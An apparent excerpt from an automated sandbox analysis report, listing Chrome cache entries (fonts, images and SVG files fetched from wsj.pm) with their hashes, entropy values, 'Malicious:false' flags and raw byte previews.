                                                                                                                MD5:7BAF32D64415A8E528351FD3ED41A17C
                                                                                                                SHA1:D10F019DA7E91FBB10B3AC97527DAA8F14040EDB
                                                                                                                SHA-256:B6C0551166BB49DA210D4C762E9BBE954E6B0E84112BCDA05C3BF7D1D356C018
                                                                                                                SHA-512:B6969B797A4E1868BDA2E611143B112263D476900BF64AA5D0A8CA85E13BA75D2F3342FE32C99974C92A919D6F5A91354DF4418788DB2A5F54395EB7658328B7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......>.n.."........................................?.........................!.1AQ.."a.q..2..#$BRb.3r..45CS....................................../........................!1A..q."Qa.......B...............?..+.kO*6.g.......0h.......b.,~v.......T.H.i?........SU*....^b.+r...*.c{...E..e.fa.Z....b..3...zL.-.a..f.&d...t,:_I...\....%...i...K.Z.rt.....&..N.vTi.]n.R..6...m....G,.....4...d.tN....ymd..E$..SA9f%.h...f..rv.+.Lh^J4EQv-R...<.4......ca...W.g..9N.>WG.F.2..O.q <..!..c5d.s.ISP.f.I.J.S..e(..]b...$a....:n=].....T.e......KG....8.An.l$x.}f.b6...._..m...aG....8..|Ga......fAv...c"8Aj.Q}F.....S..R....%..3.\..'.[a.R.R...,X..._....`~|..q.#._.e.u.9?.....1.F..B.E....T...R.Jj*-...{-......q->w..\.b.V."..6.o.....~-.x..O$.ST..xP...<.......Q...KC-^...B.mk.....[J..{...qy....I...>U2...........5Y.........&.....g..%..y....">...h..

                                                                                                                Chrome Cache Entry: 155

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 47236, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):47236
                                                                                                                Entropy (8bit):7.994813615656073
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:7Yl/9NPU2cvVWNLp8uakYHSZe9OsADw4DHqL5wtsk63VXEVXu9BDCGlY4QuVzWiw:7YvBokIbFxgw4DG+63VX0XGBTlYlu1CB
                                                                                                                MD5:E08C459A519315FCC6B4A26D2B6C8A4A
                                                                                                                SHA1:50924AD647AD4DA606ECCB8C686037ECA8C1DA50
                                                                                                                SHA-256:8D415C84AE3CAEAB1EF04300F0E9358FDE343C99C434645337C0BDE0D143D65C
                                                                                                                SHA-512:63E279C42DB4464ACE8A3AC7E0B396ECC3C7FF2BD408640530F6ED80811D7CA705E2DEF05962D70A66078B6F6ACC241C3168EE908D557CE99CB157A4F6DC53DE
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/retina/RetinaNarr-Medium.woff2
                                                                                                                Preview:wOF2..............7....X.........................:..b...0..\.`....x...........,.6.$..n..z.. ..$.....#[......n..$.(*.G.^...<..D..Tz...z...n...U............S...5;..{.. ..d.._..1w..f..J..m.l..L.(C.)M....Y1kD.y..{Sz.JT...*Y..t..j....N.E..z..3.JT.R......N.3S..pDg.pe9^2U..a..Nz.Gh.....U..^MOJ.&..p..LT.d.........^Y.....-..0yD.,bsx.&.. &d.~0s6.+".[.J. .....v....'....=..f.....n.PD...\..|;......>?#/7.R.....;.sO..Z......._g.N....;......%9Q...0a.g......~iX.%<.O...nU..v.....,.r.BL.^.....OJ..w+.j..;.tq.8.|..~uK[.g..d.......b..d.S...\uy.....CDMK...^../...?.}..#..i.U..0......Y]x?.........E...a`..,....YX.:;0{C.,..h.E%Kj...P.....3..F.F]R.H..6uV..RJ.....]R.`..."6F.t..U..t.K]D....o..+...{...s.....2.I.(.(.e.O.DR.,..3.f.......xB.mg|.................v.........kx.k.!...i......e...}.DQn......................J..T@@..p.zs.!..5E;..!.o.l.....Z.........+..G....G~mo..$Mb.DB.L...BF.........l...5..BU. .'Nv90....Z.+I.gl.,.r!.._..:.8..*.F.@...soY.SS3.H...%.i.&...d...{.q....;

                                                                                                                Chrome Cache Entry: 156

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5464
                                                                                                                Entropy (8bit):4.339733741196928
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:srny/ohQlExNBJLVuJ1euHU96iDFow9z5SrsjyGDsGnY3TrmF:szuzWl50ekULDFiwjy5GnIG
                                                                                                                MD5:A6E93BA3DACA96DF368BD52A469CF262
                                                                                                                SHA1:513F40203F3EFE7FF8F5AC8528FAB98753387076
                                                                                                                SHA-256:BEEC0E606B0397CDC95EBA5C160317D7C73F18917D6CB2EC97795AEC9B10FAFA
                                                                                                                SHA-512:85B13E04D926FF53B98742306E620DBC63C0D03108D7DF8CFC40E938103C56C744CAAD121B696657DEF0533036152F9EA80BBEF42787B2553CBD44B10B9446C8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/appstore.a6e93ba3.svg
                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 99.5 25.1"><g><g><g><g><g><path fill="#FFFFFF" d="M14.8,11.9c0-1.7,0.9-3.3,2.4-4.2c-0.9-1.3-2.4-2.1-4-2.2c-1.7-0.2-3.3,1-4.2,1 c-0.9,0-2.2-1-3.6-1C3.5,5.7,1.8,6.7,0.9,8.3c-1.9,3.3-0.5,8.3,1.4,11c0.9,1.3,2,2.8,3.4,2.8c1.4-0.1,1.9-0.9,3.6-0.9 c1.7,0,2.1,0.9,3.6,0.9c1.5,0,2.4-1.3,3.3-2.7c0.7-0.9,1.2-2,1.5-3.1C15.9,15.5,14.8,13.8,14.8,11.9z"/><path fill="#FFFFFF" d="M12.1,3.8c0.8-1,1.2-2.2,1.1-3.5C11.9,0.4,10.8,1,10,1.9C9.2,2.9,8.7,4.1,8.8,5.3 C10.1,5.3,11.3,4.8,12.1,3.8z"/></g></g><g><path fill="#FFFFFF" d="M32.3,18.7h-4.7l-1.1,3.4h-2l4.5-12.4H31l4.5,12.4h-2L32.3,18.7z M28.1,17.2h3.8L30,11.7h-0.1L28.1,17.2z" /><path fill="#FFFFFF" d="M45.2,17.5c0,2.8-1.5,4.6-3.8,4.6c-1.2,0.1-2.3-0.6-2.8-1.6h0v4.5h-1.9V13h1.8v1.5h0c0.6-1,1.7-1.6,2.9-1.6 C43.7,12.9,45.2,14.7,45.2,17.5z M43.3,17.5c0-1.8-0.9-3-2.4-3c-1.4,0-2.4,1.2-2.4,3c0,1.8,1,3,2.4,3 C42.3,20.6,43.3,19.4,43.3,17.5z"/><path fill="#FFFFFF" d="M55.2,17.5c0,2.8-1.5,4.6-3.8,4.6c-1.2,0.1-2.3-0.

                                                                                                                Chrome Cache Entry: 157

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 110 x 62, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):21892
                                                                                                                Entropy (8bit):7.981012051227347
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:AAOaWsmquqNH2D+QnjYmR9nEuCknDj6Wlke3NtAT/Df/b5L6ZHvXoWToO2p/w6q:ld/uqED1j3DnEHzFuC3f/bwZP4KZ
                                                                                                                MD5:C0D70F65DBDAA013E2DC79DF3BBE656A
                                                                                                                SHA1:332488A7515510658B6B0E81E439CDBECD48282E
                                                                                                                SHA-256:E4C4E1E817ED689070DDF3A80452B5B8CD0407DC495145D2143603EBFAB1FE69
                                                                                                                SHA-512:1408DE608CD1CC07EC7A5D4B6804C6F120E43F28E80CF2C8935951E24BBBD4975BF34A8A72BD8D0DF81E7D9F6109C72EBFAABD8E62A86E8056BF63AA3AE0EBE2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR...n...>.............pHYs...#...#.x.?v.. .IDATx.<..Ug....0.1scn.LWwU.TB..d.<.{.?..>!3!-.d..x.@B d. @ .ITI*......7..M......6.......z...^..s..p..rR....x.IDi...$]..b.....z)?.E.?...../...~.."6..#......PX...2~.A.kE.J....u.....W...._....%...vc....J.J.....5.r.r...)@"..$S.NW. .W..?CS...#.W..TUOkM...&.3.t..}p.-........".G6..o...!..N..k..-.L..1.<.d. [[.......,.N2.1...qv...:..##.......,..o..I.l......;z.m......!j....Q..8q...T...#...f.....NZ2m.d.h.id.......u....RC3.u..%j..i.+.H{...~..zZc!..~.6#U.+...Y....L@.....(+........?..z1?}.._./B(...y....r1..../(....|}.?..F...^.B!..*x...b.4....9b...r9.K.8..dj3......&ZZ....c..H.b.V....\[..7.r}q.W..e3..g8;7.....sbq.S..}`...Z..tW73...@s/.....f..f...1..g~p..]..4w.ob......7qtb......3..m......0...o.!.H6.@6VK.".K.ld...........E...k.&911..I.Z^..i&z..t.9.k..N....6...........;....d]qi).J....Y_T.R&.k4b.....c....8.Z<&.N...Y.L".3....Z,..J~..z~.......?....._..bQ.1j........u&.:3Q....N."..R..1...LW..:;.=9

                                                                                                                Chrome Cache Entry: 158

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 607x341, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):38551
                                                                                                                Entropy (8bit):7.979559483689766
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:JPQ5/bM/HsJ+HetU0E4Dz4zZw6EviDpXHEY7lcTiLv3GxoSd:qdM/HBHb0BwzWkXhS1oSd
                                                                                                                MD5:BF043F855257231B6776BF56794262D4
                                                                                                                SHA1:E3AD924760F763E0CE14815DE2B3DB188AC9B90E
                                                                                                                SHA-256:6BBD3CA87E32C7470CC5FD07008263C37AC861593476B27C91F603B213C7D4EE
                                                                                                                SHA-512:CE32B3EA7C5EB4F9D411A48FB0FDAC0F8FCD06C9C4DE3341BBB4CBF39D4F847AA84F63B6843C2CEB588C08F81B9E1248D32451FCAC9892D6F17BB8E8398BF2D3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-949345.jpeg
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......U._.."........................................O........................!.1..AQaq."2....#BRb....3r$C....4Sc.Ds.....%6...5Ft.................................2.......................!1AQ..".a.2..Bq...3RS................?......f......&...<.(.jr.2y..5...U.Od.t!e....v...Bxs.9.x..A............^B=x..{.........C}..ua.K...@Q......W..h..>..W_..".vJIX..j..%I..D0.3..Gm$'6...}.>.~{.q.zt...P:...^..9......}i......Rk.]....~`.v...N8..{...upi.Z&..K<.,....3...~..\J.+....8.9mT...j..i.N.rk,.C.?..8....=.Y...}'V.XU.\v..2....v.4.d......3.j..T..L..'....q..|`.a.<..#.l..P...7..?....4.W.ux.S.Ei.H.I..?W.....YK.<.G'......e@.v..4...3..uS. y.i... .L...1..]t.xS%@#n...)....r..vKn.+.).W..`..K)....*C;.U.T...."...${+..3.... .vq.q...f."=v$.s.y.M..Vw..6...p.A......P.C....# ..].S.*[._D.`\.........o.h.z.r.-..og|F.JG..6q.x..eJ.*.T.R....:..g.x........{...=.....q.

                                                                                                                Chrome Cache Entry: 159

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):7486
                                                                                                                Entropy (8bit):3.973611253013339
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:4XMKTTrxXtFHKAcach3v3RwluwaEhdJ3Ir4Zlp9aCixtR8g+iLQJ3tSa4tBlNO3d:48UXBj7cdh/Uyiv34Ilp9aFaMa45NO3d
                                                                                                                MD5:165E51CCDA3DA1ACE8AD7D40E81A7485
                                                                                                                SHA1:705417DEF5345565198C0D22221DA773F4946FFE
                                                                                                                SHA-256:CD6E1B047C6FF55DF32853DC017DFC0D353027C8B5F564F8B06584BFF654642A
                                                                                                                SHA-512:A3CC2558F4CB0EA9AE995120E094113C72893EC65E3725BAF39F8C818A35A8EEE10D3FF43A28FC69E0C7E6EFB3FF2BA056673EAE710032416B394D7A0BC15FF2
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="783" height="112.588"><path d="M21.652 61.544c0 3.023.878 3.607 2.829 4.097l3.023.683v1.365H7.412v-1.365l2.536-.584c1.951-.487 2.829-1.465 2.829-4.193V2.438h-2.146c-6.047 0-8.485 9.851-9.168 20.287H0V.488h34.429v22.238h-1.463c-.683-10.436-3.121-20.287-9.168-20.287h-2.146v59.105zm14.923 4.779l2.146-.586c1.951-.487 2.829-1.463 2.829-4.193V6.535c0-2.731-.878-3.609-2.829-4.097l-2.146-.585V.487h19.019v1.366l-2.243.585c-1.853.488-2.926 1.268-2.926 3.999v25.651h14.728V6.437c0-2.731-1.073-3.511-2.926-3.999l-2.243-.585V.487h19.019v1.366l-2.146.585c-1.95.488-2.828 1.366-2.828 4.097v54.912c0 2.731.878 3.806 2.828 4.293l2.146.584v1.365h-19.02v-1.365l2.243-.486c1.853-.487 2.926-1.562 2.926-4.291V34.332H50.425v27.212c0 2.73 1.073 3.804 2.926 4.291l2.243.488v1.363H36.575v-1.363zm58.423-.584h6.73c8.778 0 10.436-9.949 11.606-20.287h1.463v22.235H81.148v-1.364l2.146-.584c1.951-.488 2.829-1.465 2.829-4.194V6.632c0-2.73-.878-3.706-2.829-4.194l-2.146-.585V.487h

                                                                                                                Chrome Cache Entry: 160

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (10136)
                                                                                                                Category:dropped
                                                                                                                Size (bytes):17451
                                                                                                                Entropy (8bit):3.960425343726998
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:HszuKfFN6U8g+Onp/dZmILsiSiW2BQw/+Pb:09igp/d9LsiSiWSQw/+j
                                                                                                                MD5:E653DFCA7923DB2DFE35853484ECC138
                                                                                                                SHA1:1087A774BA6A833BED54D98399F7DEC44DEC1773
                                                                                                                SHA-256:AFCEEFD395BE95BD1B05D50C99964F1DAA86E78A9A0F9F70E43C52FA4E8D5F0A
                                                                                                                SHA-512:B562A786C59888FA71334A1D6776FBDD36782E921FCACC78EDA00C62095B8991081E05A84B9F462A9AEA1FE25E2107B359A37A023B668B77E2BE8A8A3B10E683
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.<svg width="243" height="46" viewBox="0 0 243 46" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M6.71975 19.4684C6.71975 20.4248 6.99201 20.6092 7.59774 20.7642L8.53604 20.9803V21.4124H2.30052V20.9803L3.08761 20.7959C3.69289 20.6418 3.9656 20.3321 3.9656 19.4693V0.771088H3.29957C1.42297 0.771088 0.666033 3.88753 0.454073 7.18884H0V0.154579H10.6849V7.18884H10.2308C10.0189 3.88798 9.26238 0.77154 7.38578 0.77154H6.71975V19.4684ZM11.3509 20.9803L12.017 20.795C12.6227 20.6409 12.895 20.3321 12.895 19.4684V2.06738C12.895 1.20319 12.6227 0.925668 12.017 0.771088L11.3509 0.586226V0.154127H17.2534V0.586226L16.5573 0.771088C15.9821 0.925668 15.6491 1.17245 15.6491 2.0362V10.1507H20.22V2.0362C20.22 1.17245 19.887 0.925668 19.3118 0.771088L18.6157 0.586226V0.154127H24.5182V0.586226L23.8521 0.771088C23.2473 0.925668 22.9746 1.20319 22.9746 2.06738V19.4377C22.9746 20.3014 23.2473 20.6418 23.8521 20.7959L24.5182 20.9803V21.4124H18.6157V20.9803L19.3

                                                                                                                Chrome Cache Entry: 161

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 26844, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):26844
                                                                                                                Entropy (8bit):7.992687527027362
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:CVATMh4C6ITUDSflBxHkUvMrLppC0EpjjpPPW1HmLPIT1:Z46IA0KUI/KpfpPPW1GLQp
                                                                                                                MD5:7C442E963B2FB63C4CB6FCAD8ABDE902
                                                                                                                SHA1:6E88DBE0E0B6303EE8D3E0D802C6C78B0881FDF3
                                                                                                                SHA-256:38A583DE4C9A85114EA0D3811417028BD25CA29B2EED3F84372822C527D01CA6
                                                                                                                SHA-512:A2927E82B4D4EFEBACED2EBE887CBB86D86D11D60CC09A0EE403E71427E88520DE21F29DF10B62ACB3DD9FBE807084E0D09C21CB04C405976EE706AA48588C21
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2
                                                                                                                Preview:wOF2......h........X..hz..........................H....`....<..b........6.6.$.....Z.. .....7......w.m....,.Ye...s.....m..lD............V.1..m...Y...)FS.......!m.......q...:.*...61..W"...RNXM{.f?`.._.J.?}b.....].RW.e+Yv.$.....=..!C.../......f.i..-:G..9....h...b7.....S./DG......r....s.+...T"...2.(..X..?...y...a.....D.....=M...4...A.6P.=e.o......Uc.zy.~...c.}.......l......B.d.+...:.oUw&.3.A... .s..2g.hn.`,..}...".......... m....`....._...U|c.[..F..sv.g..F.e.i....R@.../u.k...Z.......~.J.I..JS..>..I.V...G...H.b.'.Ei]#.....%*..K%.1...W..s.{.....\.KN!I...5.:qX9..E.].r...~.~p.9s.=..3d.x....D....M.A(r..v..Y.1Y..G....q......1L.h......M...F.n'...k..."m4....Q}|..&.U..e]&]=.P........./..B.W.0Ni.4..S.p......1..h..ZQd^..r.I;On.f5...3....p. ^..v.W..T2.....v8..9V..o....LM..3..V.|...X.+.(?.f.} 9@....G.....NQ..F.........U.bK6....=.h}..L.U..."..25.2.Dt]...C....LE.'NiU.a8..Gm.......Z...:x ..ME.Q1...tV..G..&.x...F..{.z.n.........g.B#......>..A.0.... ....BuO..Xl0h

                                                                                                                Chrome Cache Entry: 162

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, baseline, precision 8, 607x341, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):38551
                                                                                                                Entropy (8bit):7.979559483689766
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:JPQ5/bM/HsJ+HetU0E4Dz4zZw6EviDpXHEY7lcTiLv3GxoSd:qdM/HBHb0BwzWkXhS1oSd
                                                                                                                MD5:BF043F855257231B6776BF56794262D4
                                                                                                                SHA1:E3AD924760F763E0CE14815DE2B3DB188AC9B90E
                                                                                                                SHA-256:6BBD3CA87E32C7470CC5FD07008263C37AC861593476B27C91F603B213C7D4EE
                                                                                                                SHA-512:CE32B3EA7C5EB4F9D411A48FB0FDAC0F8FCD06C9C4DE3341BBB4CBF39D4F847AA84F63B6843C2CEB588C08F81B9E1248D32451FCAC9892D6F17BB8E8398BF2D3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......U._.."........................................O........................!.1..AQaq."2....#BRb....3r$C....4Sc.Ds.....%6...5Ft.................................2.......................!1AQ..".a.2..Bq...3RS................?......f......&...<.(.jr.2y..5...U.Od.t!e....v...Bxs.9.x..A............^B=x..{.........C}..ua.K...@Q......W..h..>..W_..".vJIX..j..%I..D0.3..Gm$'6...}.>.~{.q.zt...P:...^..9......}i......Rk.]....~`.v...N8..{...upi.Z&..K<.,....3...~..\J.+....8.9mT...j..i.N.rk,.C.?..8....=.Y...}'V.XU.\v..2....v.4.d......3.j..T..L..'....q..|`.a.<..#.l..P...7..?....4.W.ux.S.Ei.H.I..?W.....YK.<.G'......e@.v..4...3..uS. y.i... .L...1..]t.xS%@#n...)....r..vKn.+.).W..`..K)....*C;.U.T...."...${+..3.... .vq.q...f."=v$.s.y.M..Vw..6...p.A......P.C....# ..].S.*[._D.`\.........o.h.z.r.-..og|F.JG..6q.x..eJ.*.T.R....:..g.x........{...=.....q.

                                                                                                                Chrome Cache Entry: 163

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1210
                                                                                                                Entropy (8bit):7.381102766358324
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:+CYj6LAgvJxg+H1wwVmQSlAUo4SucgBld+6SK5q6kVBLiMUFyScKR5oI:+CYjwAgvzH1rV0CUvdcGlduzP0M0cKYI
                                                                                                                MD5:D2923FC69E3F374E06D4F50DA50B9588
                                                                                                                SHA1:062E7805B2F479B3CE10DE870C185B60C58EEF79
                                                                                                                SHA-256:327DA69A811D3DDF7DA0754BE37A4A91262E65708519FE0B715EEB7747F3F58F
                                                                                                                SHA-512:7E186CAE0D7A84E3BD6D0FA4D8C78F295BF6748F90E764A6A9C4F367B7DF472095999B5F7A03FF2B8DF0F251E45A65A8E3808F845842992AD9849D132C70DC58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/img/im-44291453.avif
                                                                                                                Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......<...<....pixi............av1C. ......colrnclx...........ipma...................mdat....8.{....@2...@. ............)..gC.z.....`v......0s..W..;....}..LR...\.ez..;....&B.4.a.\.)..x....X..^5.u.....[_..Il.......b....k.+'...XG.=.^....]v.%..v......:...XO.,.r....lA......N..j... .a2.w......(5..`{...].&....J.9..1..+...B..{d......t.r........H.......5E_C..g.s.(.+.%s..WW.SD.].]......BFON.*..Y.w..A..*...Hu..j...P..$..t@..7..J..=..>..Z.....D..w.R...y.......]<.Y....@.o.}.|..Tow}.{.LhR...e... L'Dl,...9.r...N.p..t.".-.tJ..j.M"\G....B.'1.K.@.......L....~"...Jw#w.W...t.\.;.%. V'[......[.Hv.<...`..y..!c....q...+NzN.H-....i......5..?.%.....SZg.P.U..Z,F+...j%.h..H!5.\."/Fd)p.(........2oZ9.....+.y..-...I.J.Oiey.@.B....k..k.Y.DH..q..vh".N..I........j[..9.c...j.N.G....C..

                                                                                                                Chrome Cache Entry: 164

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 25736, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):25736
                                                                                                                Entropy (8bit):7.992849589657931
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:768:bLIzxVL45YpJobGGxt68MAfX/1g+vU4k4M:bk9oKG368MAXSIi4M
                                                                                                                MD5:10EA31224C1480796A64D3DC474588D8
                                                                                                                SHA1:053641303CD88AAEC9F34E8B137267E43DC0A348
                                                                                                                SHA-256:30F50C27FB65C2F79BDA64A7F209FD8AF7ABACE857ADE7DC29E9539587ACE1A2
                                                                                                                SHA-512:6857C93A6ECC7C8EDE9EEE7E765CB335E407B9EDFC1DDD1C69D98FFA140046F5729C6C6A76FCEF74E12944F45CAF59033483FAE94BED0D3DA56014C9674B0BB4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2
                                                                                                                Preview:wOF2......d..........d'..........................p....`....<..b.....$..p.6.$.....Z.. ..#..7........6-xf...........A..L...zn...3.3.....C.`..._U.JE.#r....eR...Xc.....^...r;\,....1.$.......iN.v.6/....IHB6e.{.=.....Hi.E.]S.a...../.~..o{4O.RS.O5nj........)/.4.0R..q.\.$........C.6.....].%...'..S...w...J...8wH..K.Sg...I.4..4...e..v.n.0......FD.*...(F.F!F......F............}.C.41D.X.&.!1DB...UKT9&..+.E...........?.,....v..Y..B..;........}B.....H..iN..3....]H.._..%+].....3.-...9.s..9.\d....{u..d/..6....St.X.]Q_.&].....Z..M.... .k.xO..._QS8....Xn..f..E..d./...,.e$K....._.`z....S........1q.!i&N.b"2)J....R..OW......-I......!.......#...H.t.....jO..?....P7...^.BE'...+*........../...4....w.. ...m*.K.P.O...dp^(e.......#...IU...8'A...`.q..%.Y.....jH.g$Ju-......1,.....!..R....,../.....gm.8f!.6?c3&..Q...y.R.k.Q[%oL#..~qg........1.l.l.......7.a.P.\gI....+UNy.$Rf....h..n.n..6.MN..4...,.....@.%Q..3.s.....s7$ge...36.S.. .... . K.>....._..^.mhU._..C6.....N.N

                                                                                                                Chrome Cache Entry: 165

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ISO Media, AVIF Image
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1210
                                                                                                                Entropy (8bit):7.381102766358324
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:+CYj6LAgvJxg+H1wwVmQSlAUo4SucgBld+6SK5q6kVBLiMUFyScKR5oI:+CYjwAgvzH1rV0CUvdcGlduzP0M0cKYI
                                                                                                                MD5:D2923FC69E3F374E06D4F50DA50B9588
                                                                                                                SHA1:062E7805B2F479B3CE10DE870C185B60C58EEF79
                                                                                                                SHA-256:327DA69A811D3DDF7DA0754BE37A4A91262E65708519FE0B715EEB7747F3F58F
                                                                                                                SHA-512:7E186CAE0D7A84E3BD6D0FA4D8C78F295BF6748F90E764A6A9C4F367B7DF472095999B5F7A03FF2B8DF0F251E45A65A8E3808F845842992AD9849D132C70DC58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......<...<....pixi............av1C. ......colrnclx...........ipma...................mdat....8.{....@2...@. ............)..gC.z.....`v......0s..W..;....}..LR...\.ez..;....&B.4.a.\.)..x....X..^5.u.....[_..Il.......b....k.+'...XG.=.^....]v.%..v......:...XO.,.r....lA......N..j... .a2.w......(5..`{...].&....J.9..1..+...B..{d......t.r........H.......5E_C..g.s.(.+.%s..WW.SD.].]......BFON.*..Y.w..A..*...Hu..j...P..$..t@..7..J..=..>..Z.....D..w.R...y.......]<.Y....@.o.}.|..Tow}.{.LhR...e... L'Dl,...9.r...N.p..t.".-.tJ..j.M"\G....B.'1.K.@.......L....~"...Jw#w.W...t.\.;.%. V'[......[.Hv.<...`..y..!c....q...+NzN.H-....i......5..?.%.....SZg.P.U..Z,F+...j%.h..H!5.\."/Fd)p.(........2oZ9.....+.y..-...I.J.Oiey.@.B....k..k.Y.DH..q..vh".N..I........j[..9.c...j.N.G....C..

                                                                                                                Chrome Cache Entry: 166

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 65365, version 1.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):65365
                                                                                                                Entropy (8bit):7.996210704160027
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:1536:NOkoTMONJ7wus/agckJcFxITg1UfpirF4BlnAMnUljbh:EVp8TWxD1+SqBJAM03h
                                                                                                                MD5:A2F3390FA1439393209FDBF0864BFBFB
                                                                                                                SHA1:C2F90D7D0D54E44F363D3555B93799DDB370E834
                                                                                                                SHA-256:5B3DAFB879AA963CC146639ED50803BB8496968027F35DBA28D1E39D0B5ED17D
                                                                                                                SHA-512:7FD791D7791550DED285EED55DF71C02DEAC57151BD8407F6B76DBB9363F0BB780178BE98259617D50B5D705BA7F371BD8D84DFDBF25951E04C67A4AB17BE49F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://wsj.pm/fonts/woffs/exchange/Exchange-Medium.woff2
                                                                                                                Preview:wOF2.......U.......T...'.........................:......,..L.`..F..L........D..=.6.$..>..<.. ..}..F..<[S........RY.6.U.....&U..30S...:.....:..=...+.......m. ..s............M$?D6..K........RA..!S.......J...S.x....q.Y..pT..wS..).do0....d.,...'.Y[.Z.R.;......4.BH.v.X^...G.k...k.r%ws+..f4.r.........U..%...?..=.....1,.t..B....Sx....J<..e...#...w|M....D.N.d8..={...J.."{...X..N\I.[Y..G.Z....RMi...........;|.:}=vO+.1.s.,d" ."`.."..Y.!...?D@.D...4M.[vI..$x*....fa..Z.IA.E...N.K.y.<.\.m.M..eZ~......9...q...r*...L...Ay.T.Z....HS..O.+.6..'.[.=!|.....Ww"p..`p.@*..=.......RH....r.-..@....w.0k.j..c.]PIU%Ue..2.r..JKu....[..>X...\..,l..,.7}]...oN3>....5.6..E.4.-.......%8.t..)l,...B. .V.p......Qv./...*F.X.&...,O..j...c.*F...n....P.k.......t6q.....~F..V..y2a.x+C.Ao...r@..$.10... U4.uCL.dl.l.x"....c.......e .(...Ub.....}(.[..d.2~`..B...5..J.......9.+..$....*x......].]...T.:....8.[.wS...L.M.@$eJ d.....soj...(.(`..xTJ3.`..l.&_.J..t....w6.yCn...D..L.g.U.@76..

                                                                                                                Chrome Cache Entry: 167

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 25824, version 0.0
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):25824
                                                                                                                Entropy (8bit):7.9912445479427365
